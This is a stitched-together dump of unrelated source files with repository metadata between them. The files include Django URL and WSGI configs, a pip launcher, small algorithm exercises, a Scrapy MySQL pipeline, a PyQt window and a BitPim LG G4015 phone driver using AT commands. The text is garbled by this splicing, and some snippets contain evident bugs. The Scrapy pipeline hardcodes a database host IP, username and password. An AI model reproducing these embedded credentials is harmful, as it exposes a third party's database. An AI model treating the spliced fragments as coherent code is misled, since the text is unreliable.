- SetNetworkTtl (bool): If selected, table supports Set Network TTL Write Actions.
- SetQueue (bool): If selected, table supports Set Queue Write Actions.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
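# A minimal usage sketch based on the update() signature above (obtaining the
# writeActions resource from its parent table object is assumed, not shown here):
# write_actions.update(Output=True, Group=True, SetField=True)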
|
[
"pdobrinskiy@yahoo.com"
] |
pdobrinskiy@yahoo.com
|
280852c62724590eb29ecc92644759f667191119
|
ef63608c4aad9b5e9f0cbbc189483904c0b26167
|
/users/urls.py
|
038af218d1ce0def8823257b687b78cc822f74be
|
[] |
no_license
|
wgrn/authentication
|
98e1226cc44ac71702063d501359b7881aeebe74
|
0f0251d7056dec5a446ecc319ae69173ab2afaaa
|
refs/heads/master
| 2020-08-03T13:49:32.766743
| 2019-10-04T05:51:58
| 2019-10-04T05:51:58
| 211,773,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
from django.urls import path
#from django.conf.urls import patterns, url
from . import views
urlpatterns = [
path("", views.index, name="index"),
path("login", views.login_view, name="login"),
path("signup", views.signup_view, name="signup"),
path("logout", views.logout_view, name="logout"),
path("contact/<int:contact_id>/", views.contact_view, name="contact"),
path("delete/<int:contact_id>/", views.delete_view, name="delete") #/<int:id>/
]
|
[
"noreply@github.com"
] |
wgrn.noreply@github.com
|
5d6f9a66f1c3e02ba109c5b2a1e9d46eae5df09a
|
a871a6dcd54567815182a9176d9311cccd329d17
|
/venv/bin/pip3
|
e487e050a47e49427607455d3dc385b3686bb835
|
[] |
no_license
|
alearcyber/riskofspeed
|
4cb4638ebd170505b9ac739268b0e702fda0051b
|
8840c7486ef27734e3d27a4ab697f292bc0003ca
|
refs/heads/main
| 2023-04-15T18:41:26.786197
| 2021-05-05T04:54:22
| 2021-05-05T04:54:22
| 364,078,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 267
|
#!/Users/aidanlear/PycharmProjects/djangoProject/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"atl9004@g.rit.edu"
] |
atl9004@g.rit.edu
|
|
40d1051a115a6157fa99c3dbd88b6ef79e788c1b
|
b8dd380b0059fdb23acdebdac61c2a6d6966148d
|
/4_dfs.py
|
7ef6771159bce2f8c49e526ada16471d6d4cb0be
|
[] |
no_license
|
mahesh-keswani/data_structures_algorithms_important_problems
|
d252ab667829fa432f68967b4afe938872b2fded
|
c9894b1ec8fa9627436231d511c2fa39090013ae
|
refs/heads/master
| 2023-08-28T04:00:52.315796
| 2021-10-23T08:55:48
| 2021-10-23T08:55:48
| 267,893,017
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
class Node:
def __init__(self, name):
self.name = name
self.children = []
def addChild(self, name):
        self.children.append(Node(name))
## this array parameter will contain the nodes in the order in which dfs will traverse
def dfs(self, array):
array.append(self.name)
for child in self.children:
child.dfs(array)
return array
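# A minimal usage sketch (names are illustrative):
# root = Node("A")
# root.addChild("B")
# root.addChild("C")
# root.dfs([])  # -> ["A", "B", "C"]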
|
[
"2017.mahesh.keswani@ves.ac.in"
] |
2017.mahesh.keswani@ves.ac.in
|
a8031ded3535a8d986397f81e78b23a3edbd4090
|
05fa669ab75829b4ca5fdaccfdd04b7febd48d2a
|
/pipelines.py
|
08d9452f8e82bfd094d09caddd4f5da5d0646ad1
|
[] |
no_license
|
songqingbo/scrapy_wangyi
|
5429883f273ed67e3f21e12e8e1c3f50cbe9c7b1
|
2f584a41a9be8d224725697217b8c17461377650
|
refs/heads/master
| 2021-01-19T04:55:47.469907
| 2017-04-06T08:19:04
| 2017-04-06T08:19:04
| 87,403,893
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,566
|
py
|
# -*- coding: utf-8 -*-
import MySQLdb
import time
class WangyiPipeline(object):
def __init__(self):
print 'init'
self.host = '101.200.159.42'
self.user = 'java'
self.pw = 'inspero'
self.database = 'musicnew'
def open_spider(self, spider):
self.database = MySQLdb.connect(self.host, self.user, self.pw, self.database, charset='utf8')
self.cursor = self.database.cursor()
self.cursor.execute('select version()')
data = self.cursor.fetchone()
print int(time.time()), 'Database version : %s' % data
del data
def close_spider(self, spider):
pass
def process_item(self, item, spider):
try:
insert_timestamp = str(int(time.time()))
for key in item.keys():
if item[key] == None:
item[key] = ''
sql = 'INSERT INTO wangyi_music(insert_timestamp,collection_name,category,song_name,song_id,artists,album_name,album_id,album_type,collection_tags) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
temp_tuple = (
insert_timestamp, item['collection_name'], item['category'], item['song_name'], item['song_id'],
item['artists'], item['album_name'], item['album_id'], item['album_type'], item['collection_tags'])
inserted_list = [temp_tuple]
self.cursor.executemany(sql, inserted_list)
self.database.commit()
except Exception, e:
self.database.rollback()
print e
return item
|
[
"1792997269@qq.com"
] |
1792997269@qq.com
|
7359839f86074836d7c6a25a6217217830c1ca5e
|
72f128e70882dc1b8aaee44e213dce3f7a6216c4
|
/BLL/athleteOrderedItems.py
|
ccc2d2c51bd5cf710c78063b56ecc26bd751475c
|
[] |
no_license
|
Tfrodrigo/VMES-Sales-Summary
|
6e3f6f96e214c06a7bec5429cc1d8e2084fdf11b
|
e096bbfe24ffc3dd521016e4f4c63cae63981b1b
|
refs/heads/master
| 2020-09-09T13:43:52.949369
| 2020-01-25T09:26:17
| 2020-01-25T09:26:17
| 221,461,767
| 0
| 0
| null | 2020-01-25T09:26:18
| 2019-11-13T13:08:27
|
Python
|
UTF-8
|
Python
| false
| false
| 2,604
|
py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMessageBox, QTableWidget,QTableWidgetItem
import sys
from functools import partial
sys.path.insert(0, '../DAL')
from handler import DataHandler
dh = DataHandler('../VMES.db')
sys.path.insert(0, '../UI')
import athleteOrderedItems_ui
class Main(QtWidgets.QMainWindow, athleteOrderedItems_ui.Ui_athete_orderedItems):
def __init__(self):
super(Main, self).__init__()
self.setupUi(self)
self.del_btn.clicked.connect(self.deleteAll)
self.priceMap = {}
self.dateMap = {}
self.total = 0
self.food = ""
self.price = 0
self.date = ""
self.f = []
self.p = []
self.d = []
self.n = []
self.newD = []
self.results = dh.getAllAthleteOrders()
for x in self.results:
self.priceMap[x[0]] = x[1]
self.dateMap[x[0]] = x[3]
self.f.append(x[0])
self.p.append(x[1])
self.n.append(x[2])
self.total = self.total + x[1]
self.total_lbl.setText(str(self.total))
print(self.priceMap)
print(self.dateMap)
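        # trim each ISO timestamp to its first 10 characters (the YYYY-MM-DD date
        # part) before it is shown in the table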
for y in self.f:
dT = self.dateMap[y]
dT = list(dT)
del dT[10:]
dT = ''.join(map(str,dT))
print(dT)
self.dateMap[y] = str(dT)
self.d.append(str(dT))
self.tableWidget.setRowCount(len(self.f))
self.tableWidget.setColumnCount(4)
m = 0
for a in self.d:
self.tableWidget.setItem(m,0, QTableWidgetItem(a))
m += 1
m = 0
for b in self.f:
self.tableWidget.setItem(m,1, QTableWidgetItem(b))
m += 1
print(self.p)
m = 0
for c in self.p:
print(c)
self.tableWidget.setItem(m,2, QTableWidgetItem(str(c)))
m += 1
m = 0
for d in self.n:
            print(d)
self.tableWidget.setItem(m,3, QTableWidgetItem(str(d)))
m += 1
def deleteAll(self):
dh.deleteSoldItemsAthlete()
self.msg = QMessageBox()
self.msg.setWindowTitle("SUCCESS")
self.msg.setText("Items Successfully Cleared")
x = self.msg.exec()
self.close()
self.win2 = Main()
self.win2.show()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
form = Main()
form.show()
sys.exit(app.exec_())
|
[
"noreply@github.com"
] |
Tfrodrigo.noreply@github.com
|
fe2cdcd32f98b4183ed69b57275abb3b9f6fda68
|
92bbffaf4645d4f31bb875f364613d33e4b16dee
|
/comtek/wsgi.py
|
07640011ebb9a37f61e8d74081b91109451da0b9
|
[] |
no_license
|
Alwa0/comtek_test
|
5ab57d345f14eafa1d8989d3ffb9e29c4fe950b2
|
2684afb887839a98372a13bd1b36da1f659d7e73
|
refs/heads/master
| 2023-06-17T00:16:14.936805
| 2021-07-05T13:43:01
| 2021-07-05T13:43:01
| 381,620,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
"""
WSGI config for comtek project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'comtek.settings')
application = get_wsgi_application()
|
[
"a.paukova@innopolis.university"
] |
a.paukova@innopolis.university
|
d3accd1450790151f1cc4bae3aac2b7777deb88c
|
743b3aa5721a7c09cba1810de6037fbf79de5603
|
/Neural_network/f_derivatives.py
|
0f5f6e8ac3518feaf17afa54477c5c4d7fbafd21
|
[] |
no_license
|
nz0001na/handson-ml
|
f3a1186ad357a5e1b025d644af9f1e78a27d4496
|
b0f0b65e765212669c4624a4caa2ba710607ab20
|
refs/heads/master
| 2023-08-08T02:13:34.212337
| 2023-08-05T03:54:23
| 2023-08-05T03:54:23
| 249,257,389
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,741
|
py
|
'''
This lab will give you a more intuitive understanding of derivatives.
It will show you a simple way of calculating derivatives arithmetically.
It will also introduce you to a handy Python library that allows you to calculate derivatives symbolically.
'''
from sympy import symbols, diff
J = (3)**2
J_epsilon = (3+0.001)**2
k = (J_epsilon - J) / 0.001 # difference divided by epsilon
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k:0.6f} ")
J = (3)**2
J_epsilon = (3 + 0.000000001)**2
k = (J_epsilon - J)/0.000000001
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k} ")
# Define the python variables and their symbolic names.
J, w = symbols('J, w')
# Define and print the expression.
J=w**2
print(J)
# Use SymPy's diff to differentiate the expression
# for J with respect to w. Note the result matches our earlier example.
dJ_dw = diff(J,w)
print(dJ_dw)
# Evaluate the derivative at a few points by
# 'substituting' numeric values for the symbolic values.
# In the first example, w is replaced by 2.
print(dJ_dw.subs([(w,2)]))
print(dJ_dw.subs([(w,3)]))
print(dJ_dw.subs([(w,-3)]))
w, J = symbols('w, J')
J = 2 * w
dJ_dw = diff(J,w)
print(dJ_dw.subs([(w,-3)]))
# Compare this with the arithmetic calculation
J = 2*3
J_epsilon = 2*(3 + 0.001)
k = (J_epsilon - J)/0.001
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k} ")
J, w = symbols('J, w')
J=w**3
dJ_dw = diff(J,w)
print(dJ_dw.subs([(w,2)]))
J = (2)**3
J_epsilon = (2+0.001)**3
k = (J_epsilon - J)/0.001
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k} ")
J, w = symbols('J, w')
J= 1/w
dJ_dw = diff(J,w)
print(dJ_dw.subs([(w,2)]))
J = 1/2
J_epsilon = 1/(2+0.001)
k = (J_epsilon - J)/0.001
print(f"J = {J}, J_epsilon = {J_epsilon}, dJ_dw ~= k = {k} ")
|
[
"noreply@github.com"
] |
nz0001na.noreply@github.com
|
4fb41b19a08644ca54882e05c48b17021c24fa0b
|
bc2a85e8dd9244f89e2f1801cc19d570a87c74ed
|
/Leetcode/Algorithms/Easy/DFS/PathsToLeaves.py
|
336c2921cae9752f9332113f74e3e72f985fc54c
|
[] |
no_license
|
christian-miljkovic/interview
|
1cab113dbe0096e860a3ae1d402901a15e808e32
|
63baa1535b788bc3e924f3c24a799bade6a2eae3
|
refs/heads/master
| 2023-01-11T14:53:09.304307
| 2020-02-04T17:35:12
| 2020-02-04T17:35:12
| 193,549,798
| 0
| 0
| null | 2023-01-05T05:56:15
| 2019-06-24T17:28:50
|
Python
|
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
"""
Given a binary tree, return all root-to-leaf paths.
Note: A leaf is a node with no children.
Example:
Input:
1
/ \
2 3
\
5
Output: ["1->2->5", "1->3"]
Explanation: All root-to-leaf paths are: 1->2->5, 1->3
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from typing import List  # for the List[str] annotation below

class Solution:
    def binaryTreePaths(self, root: TreeNode) -> List[str]:
        if not root:
            return []
        paths = []
        curr_path = str(root.val)
        pre_order_dfs(root.left, curr_path, paths)
        pre_order_dfs(root.right, curr_path, paths)
        if not paths:
            return [curr_path]  # single-node tree: wrap the lone path in a list
        return paths
def pre_order_dfs(root, curr_path, paths):
if root:
new_path = curr_path + "->" + str(root.val)
if not root.left and not root.right:
paths.append(new_path)
return paths
pre_order_dfs(root.left, new_path, paths)
pre_order_dfs(root.right, new_path, paths)
return paths
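# Quick local check (hypothetical; assumes the TreeNode class from the
# commented-out definition above is uncommented before the Solution class):
# root = TreeNode(1)
# root.left, root.right = TreeNode(2), TreeNode(3)
# root.left.right = TreeNode(5)
# print(Solution().binaryTreePaths(root))  # ['1->2->5', '1->3']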
|
[
"cmm892@stern.nyu.edu"
] |
cmm892@stern.nyu.edu
|
4e9ab2bd4be3a4849519d5303ae16a5aed55bf46
|
24d8cf871b092b2d60fc85d5320e1bc761a7cbe2
|
/BitPim/rev2895-2991/base-trunk-2895/phones/com_lgg4015.py
|
fd8246f01ff6a959d30da98cf06c5e09949710a7
|
[] |
no_license
|
joliebig/featurehouse_fstmerge_examples
|
af1b963537839d13e834f829cf51f8ad5e6ffe76
|
1a99c1788f0eb9f1e5d8c2ced3892d00cd9449ad
|
refs/heads/master
| 2016-09-05T10:24:50.974902
| 2013-03-28T16:28:47
| 2013-03-28T16:28:47
| 9,080,611
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29,030
|
py
|
"""Communicate with the LG G4015 cell phone
"""
import base64
import sha
import time
import bpcalendar
import common
import commport
import com_gsm
import guihelper
import memo
import nameparser
import p_lgg4015
import prototypes
import sms
class Phone(com_gsm.Phone):
""" Talk to the LG G4015 Phone"""
desc='LG-G4015'
protocolclass=p_lgg4015
serialsname='lgg4015'
def __init__(self, logtarget, commport):
com_gsm.Phone.__init__(self, logtarget, commport)
self.mode=self.MODENONE
def getfundamentals(self, results):
"""Gets information fundamental to interoperating with the phone and UI.
Currently this is:
- 'uniqueserial' a unique serial number representing the phone
- 'groups' the phonebook groups
- 'wallpaper-index' map index numbers to names
- 'ringtone-index' map index numbers to ringtone names
This method is called before we read the phonebook data or before we
write phonebook data.
"""
self.setmode(self.MODEMODEM)
self.log("Retrieving fundamental phone information")
self.log("Reading phone serial number")
results['uniqueserial']=sha.new(self.get_sim_id()).hexdigest()
self.log("Reading group information")
results['groups']=self._get_groups()
self.log('Reading Ringtone Index')
results['ringtone-index']=self._get_ringtone_index()
self.log('Reading Wallpaper Index')
results['wallpaper-index']=self._get_wallpaper_index()
self.log("Fundamentals retrieved")
return results
def _get_groups(self):
res={}
self.charset_ascii()
_req=self.protocolclass.list_group_req()
for i in self.protocolclass.GROUP_INDEX_RANGE:
_req.start_index=i
_req.end_index=i
try:
_res=self.sendATcommand(_req, self.protocolclass.list_group_resp)
if _res and _res[0].group_name:
res[i]={ 'name': _res[0].group_name }
except:
if __debug__:
raise
return res
def _ringtone_mode(self):
_req=self.protocolclass.media_selector_set()
_req.media_type=self.protocolclass.MEDIA_RINGTONE
self.sendATcommand(_req, None)
def _get_ringtone_index(self):
""" Return the ringtone index"""
res={}
self.charset_ascii()
self._ringtone_mode()
_req=self.protocolclass.media_list_req()
_req.start_index=self.protocolclass.MIN_RINGTONE_INDEX
_req.end_index=self.protocolclass.MAX_RINGTONE_INDEX
_res=self.sendATcommand(_req, self.protocolclass.media_list_resp)
for i,e in enumerate(_res):
res[i]={ 'name': e.file_name, 'origin': 'ringtone' }
return res
def _wallpaper_mode(self):
_req=self.protocolclass.media_selector_set()
_req.media_type=self.protocolclass.MEDIA_WALLPAPER
self.sendATcommand(_req, None)
def _get_wallpaper_index(self):
""" Return the wallpaper index"""
res={}
self.charset_ascii()
self._wallpaper_mode()
_req=self.protocolclass.media_list_req()
_req.start_index=self.protocolclass.MIN_WALLPAPER_INDEX
_req.end_index=self.protocolclass.MAX_WALLPAPER_INDEX
_res=self.sendATcommand(_req, self.protocolclass.media_list_resp)
for i,e in enumerate(_res):
res[i]={ 'name': e.file_name, 'origin': 'wallpaper' }
return res
cal_repeat_value={
protocolclass.CAL_REP_DAILY: bpcalendar.RepeatEntry.daily,
protocolclass.CAL_REP_WEEKLY: bpcalendar.RepeatEntry.weekly,
protocolclass.CAL_REP_MONTHLY: bpcalendar.RepeatEntry.monthly,
protocolclass.CAL_REP_YEARLY: bpcalendar.RepeatEntry.yearly }
cal_repeat_value_r={
bpcalendar.RepeatEntry.daily: protocolclass.CAL_REP_DAILY,
bpcalendar.RepeatEntry.weekly: protocolclass.CAL_REP_WEEKLY,
bpcalendar.RepeatEntry.monthly: protocolclass.CAL_REP_MONTHLY,
bpcalendar.RepeatEntry.yearly: protocolclass.CAL_REP_YEARLY }
def _build_bpcalendar_entry(self, phone_entry):
entry=bpcalendar.CalendarEntry()
entry.start=phone_entry.date+phone_entry.time
entry.end=phone_entry.date+phone_entry.time
entry.description=phone_entry.description
entry.serials.append({ 'sourcetype': 'phone',
'id': phone_entry.index })
entry.alarm=self.protocolclass.CAL_ALARM_VALUE.get(phone_entry.alarm, -1)
_rpt_type=self.cal_repeat_value.get(phone_entry.repeat, None)
if _rpt_type:
rpt=bpcalendar.RepeatEntry(_rpt_type)
if _rpt_type!=bpcalendar.RepeatEntry.yearly:
rpt.interval=1
entry.end=bpcalendar.CalendarEntry.no_end_date
entry.repeat=rpt
return entry
def getcalendar(self, result):
self.log("Getting calendar entries")
self.setmode(self.MODEMODEM)
self.charset_ascii()
res={}
_req=self.protocolclass.calendar_read_req()
_req.start_index=self.protocolclass.CAL_MIN_INDEX
_req.end_index=self.protocolclass.CAL_MAX_INDEX
_res=self.sendATcommand(_req, self.protocolclass.calendar_read_resp)
for e in _res:
try:
_entry=self._build_bpcalendar_entry(e)
res[_entry.id]=_entry
except:
if __debug__:
raise
result['calendar']=res
return result
def _build_phone_cal_entry(self, entry_count, bpentry):
entry=self.protocolclass.calendar_write_req()
entry.index=entry_count
entry.date=bpentry.start[:3]
if bpentry.allday:
entry.time=(0,0)
else:
entry.time=bpentry.start[3:]
entry.description=bpentry.description
_alarm=self.protocolclass.CAL_ALARM_NONE
for e in self.protocolclass.CAL_ALARM_LIST:
if bpentry.alarm>=e[0]:
_alarm=e[1]
break
entry.alarm=_alarm
if bpentry.repeat:
_rpt_type=self.cal_repeat_value_r.get(bpentry.repeat.repeat_type,
self.protocolclass.CAL_REP_NONE)
else:
_rpt_type=self.protocolclass.CAL_REP_NONE
entry.repeat=_rpt_type
return entry
def savecalendar(self, dict, merge):
self.log('Saving calendar entries')
self.setmode(self.MODEMODEM)
self.charset_ascii()
_cal_dict=dict['calendar']
_cal_list=[(x.start, k) for k,x in _cal_dict.items()]
_cal_list.sort()
_cal_list=_cal_list[:self.protocolclass.CAL_TOTAL_ENTRIES]
_pre_write=self.protocolclass.calendar_write_check_req()
for i,e in enumerate(_cal_list):
_entry=self._build_phone_cal_entry(i, _cal_dict[e[1]])
self.progress(i, self.protocolclass.CAL_TOTAL_ENTRIES,
'Writing entry %d: %s'%(i, _entry.description))
try:
try:
self.sendATcommand(_entry, None)
_success=True
except:
_success=False
if not _success:
try:
self.sendATcommand(_pre_write, None)
except:
pass
self.sendATcommand(_entry, None)
except:
if __debug__:
raise
_req=self.protocolclass.calendar_del_req()
for i in range(len(_cal_list), self.protocolclass.CAL_TOTAL_ENTRIES):
self.progress(i, self.protocolclass.CAL_TOTAL_ENTRIES,
'Deleting entry %d'%i)
_req.index=i
try:
self.sendATcommand(_req, None)
except:
break
return dict
def charset_ascii(self):
""" Set the phone charset to some form of ascii"""
_req=self.protocolclass.charset_set_req()
_req.charset=self.protocolclass.CHARSET_IRA
self.sendATcommand(_req, None)
def charset_base64(self):
""" Set the phone charset to Base64 (for binary transmission)"""
_req=self.protocolclass.charset_set_req()
_req.charset=self.protocolclass.CHARSET_BASE64
self.sendATcommand(_req, None)
def is_mode_modem(self):
try:
self.comm.sendatcommand("Z")
self.comm.sendatcommand('E0V1')
return True
except:
return False
def get_detect_data(self, r):
r['manufacturer']=self.get_manufacturer_id()
r['model']=self.get_model_id()
r['firmware_version']=self.get_firmware_version()
r['esn']=self.get_sim_id()
def _detectphone(coms, likely_ports, res, _module, _log):
if not len(likely_ports):
return None
for port in likely_ports:
if not res.has_key(port):
res[port]={ 'mode_modem': None, 'mode_brew': None,
'manufacturer': None, 'model': None,
'firmware_version': None, 'esn': None,
'firmwareresponse': None }
try:
if res[port]['mode_modem']==False or \
res[port]['model']:
continue
p=Phone(_log, commport.CommConnection(_log, port, timeout=1))
if p.is_mode_modem():
res[port]['mode_modem']=True
p.get_detect_data(res[port])
else:
res[port]['mode_modem']=False
except:
if __debug__:
raise
detectphone=staticmethod(_detectphone)
def _build_bp_entry(self, entry, groups, in_sim=False):
res={ 'names': [ { 'full': entry.name } ] }
_numbers=[]
if entry.mobile:
_numbers.append({ 'number': entry.mobile,
'type': 'cell' })
if entry.home:
_numbers.append({ 'number': entry.home,
'type': 'home' })
if entry.office:
_numbers.append({ 'number': entry.office,
'type': 'office'})
if _numbers:
res['numbers']=_numbers
if entry.email:
res['emails']=[{ 'email': entry.email }]
if entry.memo:
res['memos']=[{ 'memo': entry.memo }]
_group=groups.get(entry.group, None)
if _group and _group.get('name', None):
res['categories']=[{ 'category': _group['name'] }]
if entry.sim:
res['flags']=[{ 'sim': in_sim }]
return res
def _get_main_phonebook(self, groups):
"""return a dict of contacts read off the phone storage area"""
_req=self.protocolclass.select_storage_req()
_req.storage=self.protocolclass.PB_MEMORY_MAIN
self.sendATcommand(_req, None)
_req=self.protocolclass.read_phonebook_req()
_req.start_index=self.protocolclass.PB_MAIN_MIN_INDEX
_req.end_index=self.protocolclass.PB_MAIN_MAX_INDEX
_res=self.sendATcommand(_req, self.protocolclass.read_phonebook_resp)
res={}
for e in _res:
res[e.index]=self._build_bp_entry(e, groups)
return res
def _get_sim_phonebook(self, groups):
"""return a dict of contacts read off the phone SIM card"""
_req=self.protocolclass.select_storage_req()
_req.storage=self.protocolclass.PB_MEMORY_SIM
self.sendATcommand(_req, None)
_req=self.protocolclass.read_phonebook_req()
_req.start_index=self.protocolclass.PB_SIM_MIN_INDEX
_req.end_index=self.protocolclass.PB_SIM_MAX_INDEX
_res=self.sendATcommand(_req, self.protocolclass.read_sim_phonebook_resp)
res={}
for e in _res:
res[1000+e.index]=self._build_bp_entry(e, groups, in_sim=True)
return res
def getphonebook(self,result):
"""Reads the phonebook data. The L{getfundamentals} information will
already be in result."""
self.log('Getting phonebook')
self.setmode(self.MODEMODEM)
self.charset_ascii()
_groups=result.get('groups', {})
pb_book=self._get_main_phonebook(_groups)
pb_book.update(self._get_sim_phonebook(_groups))
result['phonebook']=pb_book
return pb_book
def _in_sim(self, entry):
""" Return True if this entry has the sim flag set, indicating that
it should be stored on the SIM card.
"""
for l in entry.get('flags', []):
if l.has_key('sim'):
return l['sim']
return False
def _lookup_group(self, entry, groups):
try:
_name=entry['categories'][0]['category']
except:
return 0
for k,e in groups.items():
if e['name']==_name:
return k
return 0
def _build_main_entry(self, entry, groups):
_req=self.protocolclass.write_phonebook_req()
_req.group=self._lookup_group(entry, groups)
_req.name=nameparser.getfullname(entry['names'][0])
_req.email=entry.get('emails', [{'email': ''}])[0]['email']
_req.memo=entry.get('memos', [{'memo': ''}])[0]['memo']
for n in entry.get('numbers', []):
_type=n['type']
_number=n['number']
if _type=='cell':
_req.mobile=_number
_req.mobile_type=129
elif _type=='home':
_req.home=_number
_req.home_type=129
elif _type=='office':
_req.office=_number
_req.office_type=129
return _req
def _build_sim_entry(self, entry, groups):
_req=self.protocolclass.write_sim_phonebook_req()
_req.group=self._lookup_group(entry, groups)
_req.name=nameparser.getfullname(entry['names'][0])
_number=entry.get('numbers', [{'number': ''}])[0]['number']
if _number:
_req.number=_number
_req.number_type=129
return _req
def _save_main_phonebook(self, entries, groups):
""" got the the phonebook dict and write them out to the phone"""
_pb_list=[(nameparser.getfullname(e['names'][0]), k) \
for k,e in entries.items() if not self._in_sim(e)]
_pb_list.sort()
_req=self.protocolclass.select_storage_req()
_req.storage=self.protocolclass.PB_MEMORY_MAIN
self.sendATcommand(_req, None)
_del_entry=self.protocolclass.del_phonebook_req()
_index=self.protocolclass.PB_MAIN_MIN_INDEX
for l in _pb_list:
_del_entry.index=_index
_index+=1
self.sendATcommand(_del_entry, None)
time.sleep(0.2)
_req=self._build_main_entry(entries[l[1]], groups)
self.progress(_index, self.protocolclass.PB_MAIN_MAX_INDEX,
'Writing entry %d: %s'%(_index, _req.name))
try:
self.sendATcommand(_req, None)
_retry=False
except:
_retry=True
if _retry:
try:
self.sendATcommand(_req, None)
except:
self.log('Failed to write entry %d: %s'%(_index, _req.name))
time.sleep(0.2)
for i in range(_index, self.protocolclass.PB_MAIN_MAX_INDEX+1):
self.progress(i, self.protocolclass.PB_MAIN_MAX_INDEX,
'Deleting entry %d'%i)
try:
_del_entry.index=i
self.sendATcommand(_del_entry, None)
continue
except:
self.log('Trying to delete entry %d'%i)
try:
self.sendATcommand(_del_entry, None)
except:
self.log('Failed to delete entry %d'%i)
def _save_sim_phonebook(self, entries, groups):
""" got the the phonebook dict and write them out to the phone"""
_pb_list=[(nameparser.getfullname(e['names'][0]), k) \
for k,e in entries.items() if self._in_sim(e)]
_pb_list.sort()
_req=self.protocolclass.select_storage_req()
_req.storage=self.protocolclass.PB_MEMORY_SIM
self.sendATcommand(_req, None)
_del_entry=self.protocolclass.del_phonebook_req()
_index=self.protocolclass.PB_SIM_MIN_INDEX
for l in _pb_list:
_del_entry.index=_index
_index+=1
self.sendATcommand(_del_entry, None)
time.sleep(0.2)
_req=self._build_sim_entry(entries[l[1]], groups)
self.progress(_index, self.protocolclass.PB_SIM_MAX_INDEX,
'Writing SIM entry %d: %s'%(_index, _req.name))
try:
self.sendATcommand(_req, None)
_retry=False
except:
_retry=True
if _retry:
try:
self.sendATcommand(_req, None)
except:
self.log('Failed to write SIM entry %d: %s'%(_index, _req.name))
time.sleep(0.2)
for i in range(_index, self.protocolclass.PB_SIM_MAX_INDEX+1):
self.progress(i, self.protocolclass.PB_SIM_MAX_INDEX,
'Deleting SIM entry %d'%i)
try:
_del_entry.index=i
self.sendATcommand(_del_entry, None)
continue
except:
self.log('Trying to delete entry %d'%i)
try:
self.sendATcommand(_del_entry, None)
except:
self.log('Failed to delete entry %d'%i)
def savephonebook(self, data):
"Saves out the phonebook"
self.log('Writing phonebook')
self.setmode(self.MODEMODEM)
self.charset_ascii()
pb_book=data.get('phonebook', {})
pb_groups=data.get('groups', {})
self._save_main_phonebook(pb_book, pb_groups)
self._save_sim_phonebook(pb_book, pb_groups)
return data
def _del_media_files(self, names):
self.charset_ascii()
_req=self.protocolclass.del_media_req()
for n in names:
self.log('Deleting media %s'%n)
_req.file_name=n
try:
self.sendATcommand(_req, None)
except:
self.log('Failed to delete media %s'%n)
def _add_media_file(self, file_name, media_name, media_code, data):
""" Add one media ringtone
"""
if not file_name or not media_name or not data:
return False
self.log('Writing media %s'%file_name)
_media_name=''
for s in media_name:
_media_name+=s+'\x00'
_cmd='AT+DDLW=0,"%s","%s",%d,%d,0,0,0,0\r' % \
(file_name, base64.encodestring(_media_name), len(data),
media_code)
_data64=base64.encodestring(data)
self.comm.write(str(_cmd))
if self.comm.read(4)!='\r\n> ':
return False
for l in _data64.split('\n'):
if l:
self.comm.write(l+'\n')
time.sleep(0.01)
self.comm.write(str('\x1A'))
return self.comm.read(6)=='\r\nOK\r\n'
def _add_ringtones(self, names, name_dict, media):
self.charset_base64()
for n in names:
_media_key=name_dict[n]
if not self._add_media_file(n, common.stripext(n), 20,
media[_media_key].get('data', '')):
self.log('Failed to send ringtone %s'%n)
self.charset_ascii()
def saveringtones(self, result, merge):
self.log('Saving ringtones')
self.setmode(self.MODEMODEM)
self.charset_ascii()
self._ringtone_mode()
media=result.get('ringtone', {})
media_index=result.get('ringtone-index', {})
media_names=[x['name'] for x in media.values()]
index_names=[x['name'] for x in media_index.values()]
del_names=[x for x in index_names if x not in media_names]
new_names=[x for x in media_names if x not in index_names]
self._del_media_files(del_names)
names_to_keys={}
for k,e in media.items():
names_to_keys[e['name']]=k
self._add_ringtones(new_names, names_to_keys, media)
return result
def getringtones(self, result):
self.log('Reading ringtones index')
self.setmode(self.MODEMODEM)
self.charset_ascii()
self._ringtone_mode()
media={}
media_index=self._get_ringtone_index()
for e in media_index.values():
media[e['name']]='dummy data'
result['ringtone']=media
result['ringtone-index']=media_index
return result
def getwallpapers(self, result):
self.log('Reading wallpaper index')
self.setmode(self.MODEMODEM)
self.charset_ascii()
self._wallpaper_mode()
media={}
media_index=self._get_wallpaper_index()
_dummy_data=file(guihelper.getresourcefile('wallpaper.png'),'rb').read()
for e in media_index.values():
media[e['name']]=_dummy_data
result['wallpapers']=media
result['wallpaper-index']=media_index
return result
def _add_wallpapers(self, names, name_dict, media):
self.charset_base64()
for n in names:
_media_key=name_dict[n]
if not self._add_media_file(n, common.stripext(n), 12,
media[_media_key].get('data', '')):
self.log('Failed to send wallpaper %s'%n)
self.charset_ascii()
def savewallpapers(self, result, merge):
self.log('Saving wallpapers')
